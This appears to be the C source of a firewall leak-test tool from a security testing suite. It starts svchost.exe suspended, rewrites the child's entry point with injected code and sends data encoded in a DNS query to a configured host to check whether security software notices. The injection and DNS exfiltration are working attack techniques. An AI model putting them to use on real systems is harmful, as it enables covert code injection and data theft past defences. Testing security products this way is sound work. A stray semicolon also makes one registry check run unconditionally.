/*

 Security Software Testing Suite - DNStest (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the code and original idea of DNStest by Jarkko Turkulainen, http://www.klake.org/~jt/dnshell/.


 Method description:

   * Find name server's IP in registry.

   * Create child process "svchost.exe", which is assumed to be network
     allowed for DNS queries.

   * Modify the entry point of the child processes so that the infection code
     is executed instead of the original code.

   * Resume the main thread of the child process.

   * The infection code is executed. This code attempts to resolve a DNS query,
     which contains the encoded data.

*/

#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include "include/common.h"
#include "include/common-univ.h"
#include "include/dns.h"
#include "include/common-hook.h"


/*
 Retrieve DNS server from the system's registry.

 'err_inf' A pointer to a structure that will be filled with an error message and a code if an error occurs.

 The return value is IP address of some DNS server or INADDR_NONE if no server is found.
*/

u_long dns_server_get(PCOM_ERROR err_inf)
{
  u_long res=INADDR_NONE;

  char name[64];
  DWORD length=sizeof(name);
  HKEY hkey;
  LONG ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,REG_INTERFACES,0,KEY_ENUMERATE_SUB_KEYS,&hkey);
  if (ret==ERROR_SUCCESS)
  {
    int index=0;
    FILETIME time;
    while ((ret==ERROR_SUCCESS) && (res==INADDR_NONE))
    {
      memset(name,0,sizeof(name));
      ret=RegEnumKeyEx(hkey,index,name,&length,NULL,NULL,NULL,&time);

      if (ret==ERROR_SUCCESS)
      {
        HKEY iface;
        ret=RegOpenKeyEx(hkey,name,0,KEY_QUERY_VALUE,&iface);
        if (ret==ERROR_SUCCESS)
        {
          char servers[512];
          memset(servers,0,sizeof(servers));
          length=sizeof(servers);
          ret=RegQueryValueEx(iface,"NameServer",NULL,NULL,servers,&length);
          if ((ret==ERROR_SUCCESS) && (length>1))
          {
            char *comma=strchr(servers,',');
            if (comma) *comma='\0';
            res=inet_addr(servers);
          }

          if (res==INADDR_NONE);
          {
            memset(servers,0,sizeof(servers));
            length=sizeof(servers);
            ret=RegQueryValueEx(iface,"DhcpNameServer",NULL,NULL,servers,&length);
            if ((ret==ERROR_SUCCESS) && (length>1))
            {
              char *comma=strchr(servers,',');
              if (comma) *comma='\0';
              res=inet_addr(servers);
            }
          }

          ret=ERROR_SUCCESS;
          RegCloseKey(iface);
        } else com_err_set_sc(err_inf,ret,"Unable to open registry key \"%s\".\n",REG_INTERFACES);
      } else com_err_set_sc(err_inf,ret,"Unable to enumerate registry key #%d under \"%s\".\n",index,REG_INTERFACES);

      index++;
    }

    RegCloseKey(hkey);
  } else com_err_set_sc(err_inf,ret,"Unable to open registry key \"%s\".\n",REG_INTERFACES);

  return res;
}


int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("DNStest","dnstest",argc,argv,&conf,COM_TEST_TYPE_DNSTEST)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","ws2_32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  char imagepath[MAX_PATH],sysdir[MAX_PATH];
  if (com_get_system_path(sysdir,sizeof(sysdir),&err_inf))
  {
    snprintf(imagepath,sizeof(imagepath),"%s\\svchost.exe",sysdir);
    imagepath[sizeof(imagepath)-1]='\0';
    size_t imagepath_len=strlen(imagepath);
    if (com_verbosity_get()) printf("Child process binary set to \"%s\".\n",imagepath);

    conf.ip.S_un.S_addr=dns_server_get(&err_inf);
    if (conf.ip.S_un.S_addr!=INADDR_NONE)
    {
      if (com_verbosity_get()) printf("DNS server found: %s.\n",inet_ntoa(conf.ip));

      COM_IMAGE_INFO imageinfo;
      if (com_get_image_info(imagepath,&imageinfo,&err_inf))
      {
        DWORD flags=CREATE_SUSPENDED | CREATE_NO_WINDOW;
        PCOM_UNIV_JOB jobs[2];
        if (com_univ_job_init(13,2*sizeof(imageinfo)+sizeof(flags)+imagepath_len+1+3*sizeof(HANDLE),8,&jobs[0],&err_inf))
        {
          com_univ_job_stack_init_push(jobs[0],&imageinfo,sizeof(imageinfo));
          com_univ_job_stack_init_push(jobs[0],&flags,sizeof(flags));
          com_univ_job_stack_init_push(jobs[0],imagepath,imagepath_len+1);

          com_univ_job_action_set(jobs[0],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_server_init);
          com_univ_job_action_set(jobs[0],1,0,com_univ_handle_obtain_create_process);

          com_univ_job_action_set_arg(jobs[0],2,1,com_univ_job_stack_push_copy,0);      // copy imageinfo
          com_univ_job_action_set_arg(jobs[0],3,2,com_univ_job_stack_push_copy,-2);     // copy process handle
          com_univ_job_action_set_arg(jobs[0],4,3,com_univ_job_stack_push_copy,-1);     // copy process handle
          com_univ_job_action_set(jobs[0],5,4,com_univ_structure_alloc_write);
          com_univ_job_action_set(jobs[0],6,5,com_univ_infect_rewrite_entry);

          com_univ_job_action_set_arg(jobs[0],7,6,com_univ_job_stack_push_copy,-2);     // copy thread handle
          com_univ_job_action_set(jobs[0],8,7,com_univ_structure_start_resume_thread);

          com_univ_job_action_set_arg(jobs[0],9,8,com_univ_job_stack_push_copy,-1);     // copy process handle
          com_univ_job_action_set(jobs[0],10,9,com_univ_wait_mapping_event_handle);
          com_univ_job_action_set(jobs[0],11,1,com_univ_handle_close);                  // close process handle
          com_univ_job_action_set(jobs[0],12,1,com_univ_handle_close);                  // close thread handle

          struct sockaddr_in server;
          memset(&server,0,sizeof(server));
          server.sin_family=AF_INET;
          server.sin_port=htons(DNS_SERVER_PORT_UDP);
          server.sin_addr.S_un.S_addr=conf.ip.S_un.S_addr;

          char data[256];
          memset(data,0,sizeof(data));
          PDNS_SECTION_HEADER dns_hdr=(PDNS_SECTION_HEADER)&data[0];
          dns_hdr->id=htons(0x1234);                // some message id
          dns_hdr->flags=htons(DNS_SH_RD_SET);      // recursive request
          dns_hdr->qdcount=htons(1);                // 1 question entry

          char dns_domain[256];
          snprintf(dns_domain,sizeof(dns_domain),".%s.%s",conf.data64,conf.host);
          dns_domain[sizeof(dns_domain)-1]='\0';
          int ddl=strlen(dns_domain);

          // convert dns_domain to DNS domain format (every dot is replaced with a length of the next substring)
          char *last=&dns_domain[ddl-1],*dot=last;
          do
          {
            while ((dot>dns_domain) && (*dot!='.')) dot--;
            *dot=last-dot;
            last=dot-1;
          } while (dot>dns_domain);

          memcpy(&data[sizeof(DNS_SECTION_HEADER)],dns_domain,ddl+1);

          PDNS_SECTION_QUESTION_TAIL qsec=(PDNS_SECTION_QUESTION_TAIL)&data[sizeof(DNS_SECTION_HEADER)+ddl+1];
          qsec->qtype=htons(DNS_QCTYPE_A);
          qsec->qclass=htons(DNS_QCLASS_IN);

          size_t data_len=sizeof(DNS_SECTION_HEADER)+ddl+1+sizeof(DNS_SECTION_QUESTION_TAIL);

          if (com_univ_job_init(5,sizeof(server)+sizeof(data_len)+data_len,4,&jobs[1],&err_inf))
          {
            com_univ_job_stack_init_push(jobs[1],data,data_len);
            com_univ_job_stack_init_push(jobs[1],&data_len,sizeof(data_len));
            com_univ_job_stack_init_push(jobs[1],&server,sizeof(server));

            com_univ_job_action_set(jobs[1],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_client_init);
            com_univ_job_action_set(jobs[1],1,0,com_univ_load_second_dll);
            com_univ_job_action_set(jobs[1],2,1,com_univ_inet_sock_dns);
            com_univ_job_action_set(jobs[1],3,0,com_univ_client_send_result);
            com_univ_job_action_set(jobs[1],4,0,com_univ_client_finit);

            PCOM_UNIV univ=NULL;
            if (com_univ_init(COM_UNIV_INIT_FLAG_WS2_32,"DNStest",2,jobs,&univ,&err_inf))
            {
              int index=com_univ_main(univ);

              if (!univ->error.occurred)
              {
                memcpy(&univ->error,&univ->server_mapping.data->error,sizeof(univ->error));

                if (!univ->error.occurred)
                {
                  PDNS_SECTION_HEADER dns_hdr=(PDNS_SECTION_HEADER)&univ->server_mapping.data->buffer[sizeof(int)];
                  switch (DNS_RCODE(dns_hdr->flags))
                  {
                    case DNS_RCODE_NO_ERROR:
                      printf("DNS query was processed successfully, received %d bytes.\n",*(int*)(&univ->server_mapping.data->buffer[0]));
                      res=TRUE;
                      break;

                    case DNS_RCODE_FORMAT_ERROR: com_err_set_nc(&err_inf,"DNS format error occurred.\n"); break;
                    case DNS_RCODE_SRV_FAILURE: com_err_set_nc(&err_inf,"DNS server failure error occurred.\n"); break;
                    case DNS_RCODE_NAME_ERROR: com_err_set_nc(&err_inf,"DNS name error occurred.\n"); break;
                    case DNS_RCODE_NOT_IMPLEMENTED: com_err_set_nc(&err_inf,"DNS not implemented error occurred.\n"); break;
                    case DNS_RCODE_REFUSED: com_err_set_nc(&err_inf,"DNS refused error occurred.\n"); break;

                    default:
                      com_err_set_nc(&err_inf,"Unknown DNS response error occurred.\n");
                  }
                }
              }

              if (univ->error.occurred)
              {
                if (univ->error.job_index==1) err_prefix="\nCHILD PROCESS ERROR: ";
                com_univ_server_err_report(univ,&err_inf);
              }

              if (index>=0) com_univ_server_finit(univ,NULL);

              com_univ_finit(univ);
            }

            com_univ_job_finit(jobs[1]);
          }

          com_univ_job_finit(jobs[0]);
        }
      }
    } else com_err_set_nc(&err_inf,"Unable to find DNS server.\n");
  }

  return com_end_pref(res,&err_inf,&conf,err_prefix);
}
